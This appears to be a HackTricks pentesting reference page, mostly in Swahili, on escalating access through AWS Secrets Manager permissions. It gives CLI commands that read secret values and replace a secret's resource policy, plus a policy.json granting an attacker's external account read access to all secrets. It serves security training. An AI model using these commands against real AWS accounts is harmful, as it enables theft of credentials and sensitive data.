AWS - Secrets Manager Privesc

Reading time: 3 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Secrets Manager

Kwa taarifa zaidi kuhusu Secrets Manager angalia:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Attacker akiwa na ruhusa hii anaweza kupata thamani iliyohifadhiwa ndani ya secret katika AWS Secretsmanager.

bash
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Athari Inayowezekana: Kufikia data nyeti sana ndani ya AWS secrets manager service.

warning

Kumbuka kwamba hata ukiwa na ruhusa ya secretsmanager:BatchGetSecretValue, mshambuliaji pia atahitaji secretsmanager:GetSecretValue ili kupata siri nyeti.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Kwa ruhusa zilizotajwa hapo awali inawezekana kutoa ufikiaji kwa principals/accounts (hata za nje) kufikia siri. Kumbuka kwamba ili kusoma siri zilizofichwa kwa kutumia KMS key, mtumiaji pia anahitaji kuwa na ufikiaji wa KMS key (more info in the KMS Enum page).

bash
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks